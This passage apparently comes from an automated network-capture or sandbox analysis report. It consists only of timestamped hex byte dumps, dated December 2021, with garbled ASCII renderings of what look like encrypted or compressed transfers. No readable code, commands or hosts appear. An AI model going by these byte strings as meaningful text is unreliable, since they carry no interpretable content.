                                              Data Ascii: l`vN41qF#dg@i(.@=8S8H`yn@;Rq_WZG)$IzupnDBYP~X{5sY{Y2<<HS[]USe#b'!jt$asJ+5,$. @z2K|Vc+\V
                                              2021-12-03 07:24:05 UTC82INData Raw: d0 e9 06 60 b8 2f b2 0d fc 48 7c e3 56 cc f4 db 7e 21 1b ed 3b 14 56 5d 14 7a d4 3d 5a 2f 0b ca 07 37 22 7d 4f e8 78 cd 84 18 41 02 55 a5 17 c8 4f c2 c2 ac cc 8c 20 d2 dd 74 09 dd df 5a 8b 20 aa 9a e8 8f 7b cf cd f3 57 04 01 a2 61 0c 37 a6 94 31 14 ee 59 74 89 79 d5 06 fd 32 78 84 40 b0 05 0a 6f e7 14 ee a1 ff 85 61 c9 6e f8 61 65 2b 9e 27 3b 42 55 98 72 79 77 b6 6c 8b 03 d6 91 22 c4 b6 ba fd b3 26 03 df f1 25 f9 5b 76 18 05 d5 95 bb d7 02 a3 7d d3 c6 19 b9 54 56 66 6c 69 9e a0 99 fe 3d 11 5d e7 3f 0d ab f5 2b 9f b6 bb aa 7f 82 36 a2 5d 8d 46 e1 58 35 d7 80 56 20 d7 fd d9 62 54 ab ee 0a 8f 9d 59 89 9e bf ed af 13 f2 5c 1b 19 42 7a 8f fa 59 1f 0e 59 9a f9 98 60 3a 03 f5 e9 ea ba 54 93 f3 7e e4 96 11 94 f9 84 c8 e7 bc bc 29 ab e4 b3 c7 74 c2 e7 88 50 fb 50
                                              Data Ascii: `/H|V~!;V]z=Z/7"}OxAUO tZ {Wa71Yty2x@oanae+';BUrywl"&%[v}TVfli=]?+6]FX5V bTY\BzYY`:T~)tPP
                                              2021-12-03 07:24:05 UTC83INData Raw: c2 b7 e9 55 b1 ce 27 8a db 92 12 2f a0 6b 7e c0 18 c1 27 c7 e2 0c 7c 90 81 0e 5b 40 71 59 15 64 68 c8 df a4 08 ea 60 15 3a 39 6b 66 31 0e ce f3 8f 5c bd a9 59 54 85 ee 39 f0 82 66 65 d6 97 3e 8e 0e 92 05 05 84 9a de bc c8 81 6d ab ff 4a c2 5f 67 36 4c 4c e6 17 ee 35 ad 71 2f 61 cc b5 72 b8 24 51 7b 0d fa 9e 19 39 a3 de ab 13 a3 00 37 96 fc 88 d4 ac c2 68 fe fd cc b0 a6 aa 40 a0 e5 26 c0 88 f4 89 b6 56 39 32 cc 63 43 d9 1c 12 cb f7 91 60 5e e7 70 a5 91 47 79 22 62 2c 3c 76 67 86 ed ea 4f a9 73 36 89 69 be 6e e4 1a c2 0d ce c8 66 dd ab e8 1b 67 2f 68 6b 6e c9 d0 96 2a 82 6a b1 be eb f8 c3 24 ef 62 fd c4 93 e2 47 4a e2 39 f7 65 60 14 1a 2a fa 81 85 a1 a1 5e 07 3a 73 cd 55 8c 85 0d 5e d2 2d 16 ed 1f 82 77 cc 08 e4 5a 30 7f 2b a5 03 c4 cb 0d 93 b1 55 d6 5e 4b
                                              Data Ascii: U'/k~'|[@qYdh`:9kf1\YT9fe>mJ_g6LL5q/ar$Q{97h@&V92cC`^pGy"b,<vgOs6infg/hkn*j$bGJ9e`*^:sU^-wZ0+U^K
                                              2021-12-03 07:24:05 UTC84INData Raw: 28 15 a7 b8 c2 46 c5 56 a1 60 8e 20 d2 e3 1c 25 dd d5 59 8a 98 f9 a6 94 1c 71 e7 87 e7 7f 20 08 ba fd 69 3b a6 bf 34 38 d0 c8 74 83 7a da b8 a0 0d 7a 8e 5c ab 4e 20 41 ef 3c a9 a9 22 20 6a d3 f8 4c 1d 77 59 22 2d 46 9e 5e 89 71 75 58 b3 70 9b 03 c8 e1 f4 3a b7 9c e7 99 05 1c ce e0 2b c9 27 98 19 14 d0 99 a7 2e 11 84 5e fe 49 88 b3 3b 9b 6b 73 7b 9c bf 8e 39 21 1e 55 09 2f 33 8a 38 5e 34 3a 84 a0 72 95 19 fe 6b 8f 4c f8 47 f0 de 80 4a 2c fe 1d c6 46 aa ad d3 0f f1 a0 41 b8 4b 88 75 b8 1c f4 5b 3c 28 62 84 84 c0 4b 1d 16 78 2d ec 91 f0 4a c3 9f 33 8c 9e 45 9f 9c 4a e6 96 1b fc 1d a8 59 e1 aa 9e be 34 fb 98 c2 48 c9 ff af 8f f0 ae 18 e3 d7 c9 4a 08 3f d0 58 15 e0 8e de 8a 47 9f 85 34 88 eb a6 56 e4 df be 8c 17 ad 88 1c 55 41 83 7b 80 13 ff a6 52 9a 0f 7c bd
                                              Data Ascii: (FV` %Yq i;48tzz\N A<" jLwY"-F^quXp:+'.^I;ks{9!U/38^4:rkLGJ,FAKu[<(bKx-J3EJY4HJ?XG4VUA{R|
                                              2021-12-03 07:24:05 UTC86INData Raw: 04 06 0f e2 f3 91 67 a3 72 d6 76 92 10 3a de 86 0d 56 d4 9e 2f 61 0a cd 23 05 ff 56 f6 fc ce 86 f6 82 69 dc b1 60 3a 16 c6 64 a6 15 c0 27 a3 4c a5 1f f3 be 64 4c 0d 3d 7b 1a fd 97 08 b3 2e e0 85 11 82 2a 5c 10 fb 95 2a e6 c7 60 c5 6b d6 38 c7 ef c4 b2 d5 26 45 45 20 89 b6 e1 26 04 ce 7a 50 c1 2b ef f1 09 90 4c 38 ec 11 92 90 6b 70 2e 70 f2 66 c6 4c 86 ec fb 63 a1 61 3f 83 7a cc bf 1a 1b ea 08 a5 e5 6d dd b0 f0 02 ea 11 46 47 75 e5 86 18 15 88 63 a6 3e b0 fc c3 24 ef 5b b9 d9 9a 64 71 5d 74 4b de 4f 5c 1c 32 60 d0 bc 8d a8 b3 e0 c3 05 71 c7 73 af d8 1c 57 d8 35 06 65 92 bc 59 fc 13 c8 0d be 40 21 8d 43 d0 e3 f6 9b ab c9 58 49 5e 9e fd 6b 50 39 d8 70 99 1f 61 71 57 fe 79 d3 e0 f1 1e c5 5f 4c 0b 53 b9 50 89 01 e0 87 15 92 32 ac 32 84 12 b2 97 d0 4b a6 c8 84
                                              Data Ascii: grv:V/a#Vi`:d'LdL={.*\*`k8&EE &zP+L8kp.pfLca?zmFGuc>$[dq]tKO\2`qsW5eY@!CXI^kP9paqWy_LSP22K
                                              2021-12-03 07:24:05 UTC87INData Raw: 86 73 d2 21 c5 cc 79 a2 55 94 1d 2d 41 f4 1b f7 e6 dc 2b 4f cb 45 fe 4a fc ab dd d8 11 48 45 b9 72 6a 17 a7 7f 9b a4 c7 fe fa c6 cd 76 ee a1 09 1e 4a 71 2b e4 74 d3 1f 05 df 84 b3 a3 2e aa 55 ef dd 73 c0 04 98 66 66 4b cf b2 8e 22 06 40 4e f7 24 07 f6 ad 59 23 b0 c8 9e 70 94 3b b3 28 8d 46 e1 67 ac c6 93 4f a0 0f 12 d9 63 58 ba f2 04 9b 62 5b 89 90 bb 15 a9 68 3f 4a 33 33 cc cd 88 ee 68 6f cc 71 24 f9 ec e7 55 cf f4 eb 9b 76 45 9f 98 c4 51 1a 24 bc 46 81 c0 c9 99 95 07 a1 cc e3 d1 47 c3 f9 76 1d d5 50 19 cd ec 80 4e 8c 5a 25 7a 15 e6 19 9c 41 47 9e 92 17 84 f9 bd 71 be ce b1 99 44 85 04 1a 5c 79 53 00 4b 13 e0 e7 57 9d 27 37 b2 e6 27 c8 36 36 02 7a ba d4 9f e3 7d 3e 8c 8e 6b 0f 21 6c 0c b3 2b 25 d3 37 f4 1b bd 00 03 eb 83 bd 31 e4 ff b0 92 a1 0f 90 89 ce
                                              Data Ascii: s!yU-A+OEJHErjvJq+t.UsffK"@N$Y#p;(FgOcXb[h?J33hoq$UvEQ$FGvPNZ%zAGqD\ySKW'7'66z}>k!l+%71
                                              2021-12-03 07:24:05 UTC88INData Raw: 3d c1 2d aa 59 48 a4 cc bc 60 35 1b 7f 79 10 ee f4 63 1a 5f df 8d 39 cd 00 1c 18 ed df 0f a6 c5 60 cd 19 04 ae 70 84 49 a2 d3 f6 4f 12 f5 89 b4 9e e9 32 dd 71 41 dd 0c b7 c9 f7 9b 62 34 28 6a 5b 94 6c 07 18 63 f6 ba 58 6f f5 d3 fb 4b b8 48 7f 8b 78 bd 68 1e 68 a8 0c d6 d1 47 9d b8 e1 0d b1 6f 46 47 75 dc c3 0b 18 0d 43 b0 a8 c1 b8 0c 24 e5 77 4e b4 8f 6f 78 40 40 00 4e 4d 5c 16 18 5b 19 bc 87 a5 a2 67 b6 ec fc ed 79 87 9a 65 87 d2 3c 1b e2 ec ab 1c fd 19 ea 4f c7 86 2b a5 06 d5 90 c2 90 b1 55 fe 2e 38 a0 ff 61 27 c7 98 72 9d 0a 4b 66 2b b8 6a dc f5 fc a0 c6 73 59 21 69 73 50 83 14 96 a8 1a 1d 11 d2 70 84 69 75 bf 95 4d 11 ad 87 19 16 af 60 97 eb f8 5f 0c 8c 35 f7 8e 38 1b a8 04 f0 97 3d db c3 88 70 55 b8 5d 9e 4f db a5 c9 6a a4 46 6c c4 73 df 3e 09 d5 95
                                              Data Ascii: =-YH`5yc_9`pIO2qAb4(j[lcXoKHxhhGoFGuC$wNox@@NM\[gye<O+U.8a'rKf+jsY!isPpiuM`_58=pU]OjFls>
                                              2021-12-03 07:24:05 UTC90INData Raw: a7 b9 f9 3b 25 0c ce e0 3e fa 31 bf 08 05 df 8c 12 d6 01 ac cf f1 ec d4 b7 3b 9c 71 e1 64 8f b0 8f 3b 24 10 46 e1 06 d1 9d 29 5e 81 a7 b1 b4 66 80 19 6e 6a 8f 4c fd c3 d0 c4 93 44 3a c7 e3 d8 62 5e 80 fd 2d a5 ab 59 f2 58 97 50 af 67 75 4a 33 36 53 7e 92 3a e7 01 07 71 25 d5 d3 64 55 c5 81 c8 e0 bd 5e e2 50 4a e6 92 19 c7 8a 80 c8 e5 bb 90 01 ba e0 23 f9 db c9 ee aa 32 ee 54 0e 19 d7 cf 5d 88 41 59 67 58 18 fd 1e 88 45 e5 5f 3c 97 ff b2 d6 cf ce b1 91 28 86 89 30 58 6e 3b a7 82 68 27 e3 41 91 61 b5 08 89 ab da 27 23 2e 42 2b d1 8c d3 7d 3d d5 b0 69 0f 2d 72 66 d1 02 2c f8 26 dc 5c a8 fe 08 d6 87 bd e2 97 be a4 6c aa 0b d2 9c c5 4a f9 df eb 15 db 30 2a 90 b4 a8 aa ed 87 ac 56 74 ed b8 bd 87 87 c0 7d d1 d9 c9 a3 9a e4 49 67 0d 7b 9b ae 8b b9 f5 a1 44 b8 ef
                                              Data Ascii: ;%>1;qd;$F)^fnjLD:b^-YXPguJ36S~:q%dU^PJ#2T]AYgXE_<(0Xn;h'Aa'#.B+}=i-rf,&\lJ0*Vt}Ig{D
                                              2021-12-03 07:24:05 UTC91INData Raw: c0 3e e6 80 96 e4 38 32 dd f8 7b d0 24 f1 d8 fa b1 61 4e ee 6a d6 bb 6b 74 27 72 f1 a1 42 4f 39 ee f9 4d a4 76 2c 9a 6a a4 68 17 3b ee 0f d6 db 7c c9 a8 f5 2f 0f 2f 44 41 6c c4 d7 11 3d 53 6e b0 ae d5 d5 d2 30 f7 67 e8 dc ba 6e 79 4a e2 2b f2 5f 4f 3e 8c 21 d2 ba 94 a8 d8 54 b2 3a 75 d4 71 96 90 0f 5b bd 14 1d f3 e7 95 48 f9 0f f1 40 32 f7 3c 7f 11 c7 f0 f2 b9 a5 4e e2 37 45 0e eb 4f 3f fe dd 67 4b 13 5f 73 56 e9 be cf f1 c5 ee d5 66 62 ef 39 7c 24 08 05 93 b8 06 97 2f 08 67 50 9f 93 bf 95 48 8e 89 90 18 1c d1 d0 bc bf e1 37 ca 9d 3d db c0 28 1d 74 9a d7 f8 29 d8 b8 52 1f 71 be 4c 95 5b cf d3 e3 7b a2 5a 6c cb 8e 57 2b d3 cc ab 96 90 94 7a 3e f6 a3 cc 1d fd d8 3e b4 d0 7a 01 bd f3 32 39 d3 2f c5 3f f7 2f db 30 64 d2 09 f5 32 4d 6a fa b4 05 d0 43 b1 66 cd
                                              Data Ascii: >82{$aNjkt'rBO9Mv,jh;|//DAl=Sn0gnyJ+_O>!T:uq[H@2<N7EO?gK_sVfb9|$/gPH7=(t)RqL[{ZlW+z>>z29/?/0d2MjCf
                                              2021-12-03 07:24:05 UTC92INData Raw: 50 e0 b9 a0 78 ee 38 da b0 98 90 66 64 ef c4 92 56 29 ec 16 c8 67 45 a9 71 b1 f2 aa 4d a1 fd 97 50 ad 00 f0 5b 37 21 bc 79 8e eb 46 03 2f a2 20 fd 9e 77 51 43 8e e9 e0 bc 6d 84 9d 4a ec e5 4d be 46 8a b2 f0 af be 07 ab e4 aa e1 42 c9 50 a1 90 ff 90 19 cf d5 dd 5f 86 68 fe 58 15 e6 02 f0 80 58 8a 68 3d bb e9 a4 5c f2 c7 b9 82 56 dd 3e 18 69 78 51 77 9f 06 f3 e9 41 84 05 7a 4c e7 01 d8 3f 36 0e 42 3a db 85 1d 7e 11 f9 a6 7a 09 30 61 6c c0 05 2d cc 30 22 5a 93 06 1f f6 9a ab fa 9d b9 a3 98 b4 34 2e 8a e2 43 c6 09 15 14 f7 2d 15 81 95 4b b9 9c 53 bb a8 71 4f 03 86 8f 96 da c3 65 eb fc bc 82 f7 4b 67 1c 60 96 5b a1 ce fd 9e e5 46 ee 48 d6 04 11 50 aa 22 7f 51 74 db 47 22 65 cb 4a 76 ce 7e 67 ff 8f 82 6e 22 9f 18 29 35 07 97 69 3b 72 f0 92 bc 41 0d ee 65 fe 87
                                              Data Ascii: Px8fdV)gEqMP[7!yF/ wQCmJMFBP_hXXh=\V>ixQwAzL?6B:~z0al-0"Z4.C-KSqOeKg`[FHP"QtG"eJv~gn")5i;rAe
                                              2021-12-03 07:24:05 UTC93INData Raw: 1b c6 be d7 db 69 ce bc f0 01 9b 55 9d 47 7f c9 c4 61 c9 82 6a b4 be 59 b8 1e 24 e5 77 96 45 9b 6e 7e 48 99 e4 e1 4d 58 00 80 5b 32 bc 87 a5 c4 1e b2 3a 79 19 31 a2 b0 29 57 d2 36 0c fb e2 92 53 d4 76 e0 4d ba 68 fe a1 02 d4 cb 53 93 b1 59 c9 30 58 98 d5 59 2d ef d2 ae be 25 72 55 58 fe 62 cf f6 d7 c0 c5 73 53 89 00 a4 54 89 03 bb 16 16 92 3e f4 66 95 15 90 87 95 49 ac 1c 92 09 11 9c 44 bd bf fa 32 c5 f7 e9 f3 87 2d 93 c9 9c 00 80 e7 ca b7 4b 7b 6d 73 4c 93 4d de ad 2b 68 a4 48 6c c7 9a f3 31 0b a4 61 85 9f bb 42 24 e6 64 59 9f e7 f4 62 78 d6 6b 02 80 b2 b2 20 cd 42 f9 fd 20 2b d1 1e a6 5e 0e ff 1a 68 7e ee aa 3e 75 52 be 7b 33 1c de f7 0d 37 60 00 ca a8 db 73 eb b9 3e a6 9e 4f 68 1c d0 1c bc 71 e9 0c 42 a5 77 b2 07 fc 40 62 93 64 dd f0 cf 82 5b ee ee 2c
                                              Data Ascii: iUGajY$wEn~HMX[2:y1)W6SvMhSY0XY-%rUXbsST>fID2-K{msLM+hHl1aB$dYbxk B +^h~>uR{37`s>OhqBw@bd[,
                                              2021-12-03 07:24:05 UTC95INData Raw: 7f 2f 85 71 24 fd 9e 77 5b a0 c1 eb e0 b7 53 8e 90 25 09 96 1b b6 29 ea ca e1 a0 87 0a ba e9 91 6d 45 c9 e8 bb ff 94 52 19 c5 e8 fd 4a 9d 5e 3e 6d 17 e6 08 f0 86 50 48 f9 34 96 fb bf 36 8e cc b1 99 5f 42 82 18 72 7a 51 7b ef 7f e2 e3 4b b3 1e 66 b4 f7 23 b4 13 27 04 48 44 bd 9d e3 75 1b d4 96 78 02 03 03 66 c0 12 0a ce 2c d7 73 91 03 09 fc ea c9 eb 97 b3 94 83 a0 21 c1 85 a1 7e fc c7 1f 7b 9b 30 01 98 b9 5a a6 81 9a bf 58 61 6d 1e 8e b9 d1 2c b2 2d d1 91 93 8b ef 69 bc 09 6a 8b ca cc e0 f5 ac 78 57 e5 59 c0 03 33 ec b9 28 66 4d 07 dd 6b 28 75 d9 49 b4 f5 db 78 f4 96 a0 7f 33 95 0d 48 a6 04 bb 64 1e 70 f2 a5 97 51 07 e8 1b 98 9a 6a f1 92 88 df ad 69 30 ef 13 92 64 6b b3 e5 70 c5 a9 9c c1 27 b1 c2 b7 b9 f0 02 fb 31 c3 82 9a 33 ba 5f 6a 58 f5 49 d3 3d 06 74
                                              Data Ascii: /q$w[S%)mERJ^>mPH46_BrzQ{Kf#'HDuxf,s!~{0ZXam,-ijxWY3(fMk(uIx3HdpQji0dkp'13_jXI=t
                                              2021-12-03 07:24:05 UTC96INData Raw: d2 bc 83 a2 83 f9 b1 3a 79 eb 72 af b6 1c 57 d4 4f 39 f1 e1 89 21 f8 0f d2 45 b8 60 d4 5a 02 d2 d2 f7 ba 9f 5d ef 20 38 c8 fc 61 27 95 da 73 e0 df 5a 62 5c fc 6c a1 1f d4 e0 c0 59 53 09 3b 41 53 89 40 93 b9 17 92 38 d2 70 84 11 bc 97 27 48 a6 c4 97 30 99 a4 c2 b6 93 f1 0c e9 8e 35 f5 f4 0f 1f 7e 81 a0 99 39 f1 37 59 70 5f 90 47 bb 63 de d6 f1 1b 82 4e 7d c6 7a e2 2b 74 3e bd 85 9b bd 56 21 f5 9a bb 8c eb f0 64 47 d6 6b 02 86 fc a3 26 cf 7e e9 d5 3c 2f d1 18 b0 d3 09 ff 18 41 7d fa be 1c d4 44 c3 9d 1b 80 da f5 11 5b 81 14 e2 12 db 70 90 4a b3 a1 9a 4d 6d 75 22 08 94 d6 eb 2c 48 cd 2c b2 8a dd 51 6f e6 2b 3a f0 cd 84 22 44 9d 2e 07 58 20 e6 7e cf c7 59 78 ea e1 05 18 ab 1b 2a e9 63 f7 85 6b d9 02 55 af c5 2c 4f d3 c4 d0 24 68 20 d8 cf 5e 48 92 de 50 97 0c
                                              Data Ascii: :yrWO9!E`Z] 8a'sZb\lYS;AS@8p'H05~97Yp_GcN}z+t>V!dGk&~</A}D[pJMmu",H,Qo+:"D.X ~Yx*ckU,O$h ^HP
                                              2021-12-03 07:24:05 UTC97INData Raw: cb 4a ff 2b 53 59 1f 95 7e e3 8a 4d 92 8b 2f 92 fb a4 5c f3 30 b0 bf 50 4b 9a 35 5c 68 54 67 7e 12 cc e9 47 92 72 86 b2 e6 29 c0 34 20 04 53 2e cc 61 e2 53 34 f7 df 14 0d 2b 78 78 d3 11 27 c2 38 c3 52 41 01 25 f0 8c ca 94 95 b9 b8 8d a1 34 d5 8b df 4f e0 39 14 38 e0 35 24 6c 98 fd a9 96 4a df 2d 72 63 05 e4 fb 85 d3 47 df c6 b5 b0 9f e4 50 62 1b 94 8c 89 a3 f5 e6 a3 5e 57 eb 57 c0 e9 1a 7c b9 03 65 63 a5 25 94 d7 5e d3 5f bb ed 7a 78 cf 9c 88 6e fe 95 07 36 df 0d af 64 3b 67 8d 1a b3 52 06 fd 70 e6 9c 42 b5 b5 86 d0 ad 66 55 11 14 94 1a ad bd e1 37 c3 a3 b0 9f 9e b0 c8 a1 77 d0 d8 f1 0b bb e1 92 1b 3f 53 42 6a d9 1b c8 e7 11 e9 2d 57 cc 96 0c 20 86 71 79 11 e1 f4 df 0b 00 17 fc 4b e4 35 11 75 7f cf 05 e0 e1 e4 7c a6 a4 5d 5f 84 6d 33 dd 80 7a 6a a5 e1 27
                                              Data Ascii: J+SY~M/\0PK5\hTg~Gr)4 S.aS4+xx'8RA%4O985$lJ-rcGPb^WW|ec%^_zxn6d;gRpBfU7w?SBj-W qyK5u|]_m3zj'
                                              2021-12-03 07:24:05 UTC98INData Raw: 18 9e 1e 07 a2 88 b1 d0 14 b6 59 e5 cc 0e 4d 3a b6 64 74 6f 8f b8 92 d6 2f 2d 45 f0 2d 62 96 28 58 27 ab b7 a0 7a 8a cf cc 46 85 41 f3 32 fd c5 93 41 33 e6 1e d9 6a 4f 52 fe 2a e4 82 9f 95 98 97 58 b1 ed f5 66 3e 30 3c e9 85 ec 60 69 08 70 24 f9 83 6a 55 c7 ec 17 e1 91 4f 9c b4 c5 e7 96 11 90 fe 9a c4 e1 a2 8c f9 aa c8 b1 a2 fc c8 ee a6 9b e6 5c 19 c7 d2 35 4d a0 52 46 55 15 ee 1d eb 74 46 b2 94 17 92 c3 e8 a6 1b 31 b6 b9 40 63 8a 30 fd 79 51 7d 51 13 e0 f2 57 86 0b 55 20 e6 2d db 27 34 00 5f d5 d0 b3 ef 77 3e e9 98 aa 0e 2b 74 6b de 07 23 d3 2c d8 43 41 01 25 fd 86 b2 da a0 a0 a1 96 ab 36 d4 9c 30 4b d2 c4 0d 07 f3 32 10 96 85 b5 a9 ba 49 87 5d 6b 70 0b 97 96 83 cf b3 d3 f5 b0 a1 83 e2 32 3e 0d 6a 87 a9 bd f1 f1 a6 4f 42 f5 b6 cb 3b 1e 49 b1 34 73 5f 8a
                                              Data Ascii: YM:dto/-E-b(X'zFA2A3jOR*Xf>0<`ip$jUO\5MRFUtF1@c0yQ}QWU -'4_w>+tk#,CA%60K2I]kp2>jOB;I4s_
                                              2021-12-03 07:24:05 UTC99INData Raw: 43 d5 24 e1 ce e8 87 9e 4e c2 61 59 84 16 7a 27 61 f2 af 5e 74 83 ec e8 4e af 9e 3e a5 6c a1 7b 61 17 ef 0e d2 b4 e5 df ba eb 10 43 3d 40 4b 61 de c3 1a 04 87 75 bf 56 c2 ef db 26 e2 71 82 cb 9b 6e 7c c4 55 80 36 23 d9 10 74 a5 bd 6f 86 a1 ad 69 a0 29 76 c7 68 82 80 e0 56 fe 33 1d 88 f3 82 5b f8 0e db 6d 43 bf d4 bc 11 d7 e3 ed 97 ae 54 11 27 67 8a fa 63 56 e1 d9 70 99 6f dc 60 58 f4 61 06 47 03 eb db 7f 40 0c 28 60 55 96 14 6d b8 3b 82 3a d5 1e 03 14 d6 3a fa 9a a7 c2 94 07 04 b6 c7 bc ae ff 3b ce 72 34 df 97 2b 66 70 8a da 93 52 5f ba 58 7a 58 a3 46 80 48 dc c7 f2 77 a8 b2 7c e0 08 e8 2b df d3 a2 88 8c ba 53 3e f4 a4 3d 8d c7 f5 0e b6 d3 6b 17 a9 e3 b4 d8 dd 62 ef fe f3 17 37 e5 4f 2c 23 ff 09 59 6f fa bb 14 d6 52 66 71 1b 91 dc 8c 17 27 6c 10 cf 1d f1
                                              Data Ascii: C$NaYz'a^tN>l{aC=@KauV&qn|U6#toi)vhV3[mCT'gcVpo`XaG@(`Um;::;r4+fpR_XzXFHw|+S>=kb7O,#YoRfq'l
                                              2021-12-03 07:24:05 UTC100INData Raw: 45 eb 60 ef c4 93 9e 2c ef 03 aa ee 54 ac f5 0a e2 aa 53 e6 5f 96 50 ad 3f f8 4e 3b 58 37 7a 85 e6 3b 03 0c af 35 f9 8c 37 43 c4 2b e3 e8 91 43 97 f3 1d e6 96 11 60 41 aa c8 e0 ba 94 07 a9 e4 bf d1 5a ea ee aa 90 ff 50 19 d4 f4 ce 4c 8b 51 51 59 c9 e6 02 f0 88 17 e5 98 3d 97 ff c0 65 e4 ce b0 be 58 7b a7 32 5c 7f 22 fe 82 13 ea 99 43 c5 60 a4 b3 e6 2b d1 0f b6 06 42 21 dc b7 70 7d 3d f5 bc 60 71 b8 72 66 ca 3c e7 d2 3d da 48 bb 06 66 6e 87 a5 e3 84 bf 99 af b9 21 f8 1e cc 4a f4 d4 10 17 e6 37 6e 04 9d 4b a2 bb 66 ae 06 61 66 07 f8 4d 86 d3 4b fe c7 ad a7 8b e1 3a 7e 0c 6a 89 ad b1 e7 8e bc 5f 46 ea 59 cf 6c 3f 51 bb 2c 0f 9f 8b da 6d 0e 66 cb 75 37 df 78 72 d9 26 56 60 21 93 f9 31 ec 06 bb 75 57 36 f9 8d b9 8e 05 be 1b 3c 99 6a fd a5 82 b5 74 63 5f 3b 11
                                              Data Ascii: E`,TS_P?N;X7z;57C+C`AZPLQQY=eX{2\"C`+B!p}=`qrf<=Hfn!J7nKfafMK:~j_FYl?Q,mfu7xr&V`!1uW6<jtc_;
                                              2021-12-03 07:24:05 UTC102INData Raw: e2 0b 45 47 7b f4 67 18 15 82 75 bb bb c5 c3 d0 22 fa 67 07 da b6 74 7a 31 ec 39 e1 49 5b 98 ad 96 fa 26 85 a1 a1 60 a8 55 da c7 79 8d 87 0b 44 d4 3c 0e f5 fe 98 a5 fd 35 c2 4f c7 4e 2a a5 06 d0 e0 87 8f b0 5f eb 49 99 9e fd 67 05 76 da 70 97 16 40 0d f1 fe 68 d6 e0 c8 f3 c2 73 42 0f 37 7f ae 88 29 8b bb 6c 9c 39 d2 74 97 16 90 25 97 49 ac d4 8a 77 bf a5 c2 b6 a0 f5 37 c1 8c 24 f5 98 39 e3 7f a7 f8 95 46 d7 b9 58 74 57 bf 37 b2 4c dc d2 98 bd a5 4c 7b e4 99 e2 3c 03 c9 a7 ea 36 bf 53 25 ee a3 d0 8a eb e7 1f ba c1 95 07 80 eb a1 5d d2 4f ed d1 e0 07 4b 1a b0 d9 1f e7 75 c0 6a fa b4 09 ce 41 b8 71 0a 86 c1 ef f9 27 40 03 e0 6d d7 72 ed ab a5 89 04 4d 69 02 d2 10 fb 7b e9 0c 42 92 34 a1 01 f6 40 69 f8 4b 23 f1 e1 94 22 4c e0 2d 07 56 54 13 77 41 74 34 aa 09
                                              Data Ascii: EG{gu"gtz19I[&`UyD<5ON*_Igvp@hsB7)l9t%Iw7$9FXtW7LL{<6S%]OKujAq'@mrMi{B4@iK#"L-VTwAt4
                                              2021-12-03 07:24:05 UTC103INData Raw: f5 e3 f6 a7 2a 36 9c 4a ec 89 0b af 42 80 d9 e5 b5 83 f9 aa c8 82 d3 3c c7 ef a0 94 e1 dd 32 cf c4 ca 41 85 46 4e 09 89 ef 15 fe c1 db 97 8e 27 0b f2 ac 45 78 c7 ab 85 cf 5a 92 26 c0 70 4d 6b 1c 1a fd f5 dd 9c 19 73 dd 4f 2d db 2d 3a 1c 51 2f d1 8e e7 65 c3 fe 9c 43 0d 50 7c 67 c0 10 3d 5e 16 dc 5b be 0d 00 ec 9a f5 75 9e ae ad d9 37 2e c8 97 52 43 e7 db 89 1d e1 28 6e 3b 9f 4b a2 8d 5f a8 56 61 67 10 9e 79 86 ff 5a d0 a2 b2 a2 9a e0 57 4f 94 68 8d af b6 f8 9a 0f 5e 46 e4 57 c0 04 1f 50 aa 2c 7f 43 74 db 47 56 76 b6 53 a1 dd 7c 67 f8 11 a3 6e 33 94 0a 2e dd 26 44 6e 38 61 65 84 a4 72 f8 ee 74 f4 04 63 e3 94 79 da bc 62 c3 34 0a b2 91 3a bd e1 aa e0 ba b8 1e 9c b0 c2 2b e4 c0 26 00 2e 93 d6 0e 12 29 7e 95 52 d9 1b 5e 30 0c ce f8 57 cd 86 90 29 98 51 a6 11
                                              Data Ascii: *6JB<2AFN'ExZ&pMksO--:Q/eCP|g=^[u7.RC(n;K_VagyZWOh^FWP,CtGVvS|gn3.&Dn8aertcyb4:+&.)~R^0W)Q
                                              2021-12-03 07:24:05 UTC104INData Raw: 86 78 87 0a 44 da 3c 0e fb fa 7d 5a d0 12 e4 22 3a 42 2b af 11 d6 ff ef 9a b1 4e e7 39 5f 61 fc 4d 27 e8 de fe 2a 2e 42 7d 4d ed 60 dc ee dc f7 3a 72 7f 0a 30 62 58 89 14 9b a6 1c 6c 39 fe 60 82 14 ae b9 1b fe c9 99 92 18 1c ae dd b0 ac f2 24 d6 84 2a ed 79 28 31 69 88 8a ec 21 d8 b8 5c 73 05 c7 57 92 4d d8 e8 8b 68 a4 4c 62 d3 13 e8 3c 18 d7 a2 8c 61 be 7f 3d f3 c9 cd 8d eb f2 0e b2 a5 fa 04 ac f6 af 39 d6 5d e5 d5 e7 27 ce 3a 4e d2 25 f3 1e 78 6e 95 22 14 d6 58 a1 52 08 88 de e6 0f 39 61 ea e3 3a d2 74 fb 91 c1 5e 61 b0 76 06 d7 00 94 c3 e1 13 69 73 2c 9e 17 f4 2a 61 e6 56 d9 f9 a2 1e 22 37 e4 33 25 41 55 05 6f c7 d5 a5 02 25 e2 12 0f a1 74 74 e0 7c d9 79 19 86 02 7e a0 80 72 b3 2c 3f f8 5f 9f 10 db cb 20 27 dd df b0 9d 0e 9b 8f 9d 37 60 cf c0 f2 81 2b
                                              Data Ascii: xD<}Z":B+N9_aM'*.B}M`:r0bXl9`$*y(1i!\sWMhLb<a=9]':N%xn"XR9a:t^avis,*aV"73%AUo%tt|y~r,?_ '7`+
                                              2021-12-03 07:24:05 UTC106INData Raw: 88 47 94 85 3a 88 ef a6 51 e4 df b9 8c 45 ad 88 1c 51 68 54 62 98 53 8e e2 41 95 10 7a a1 ee 2d ca 2f 3a 0a bc 2a fd 8e e6 04 21 fe b0 6d 1a 45 32 0a 3f eb d8 cc 32 cf 53 bf 11 01 e5 92 5b e8 bb a0 b7 91 a3 38 dc 5d e6 71 ff c7 1f 3c 5f 30 01 98 e2 6a a9 96 48 b3 4e 63 6b 0f 86 8f 98 c8 b3 d3 f5 b0 ab 8b e3 7f 1d f2 95 72 ba bc f1 fd a6 4f 4e f6 b6 cb 3b 17 53 35 9f 7a 64 0b db 6b 28 6d de 55 a0 cc 70 64 0a 9d a4 63 30 9d 1f f1 e3 8d b9 6e 32 6b e4 9e bb 52 16 e6 6b fe 66 6b d7 b8 97 de ab 22 32 3d 13 92 71 31 ae e9 36 f8 a8 85 1f 9d 9c c5 b0 fa e8 5b e1 3d 9b d6 83 13 2a 46 94 53 f5 02 c7 3a 19 f1 13 81 e5 bd 0d 20 8c 59 f1 13 ea d5 a2 26 94 17 f8 55 17 24 31 62 6e c7 10 e9 09 98 5a ae ad 46 45 a5 3a 27 d0 93 76 68 c7 96 3a 61 f1 bf 30 13 fa 5f d6 a3 d0
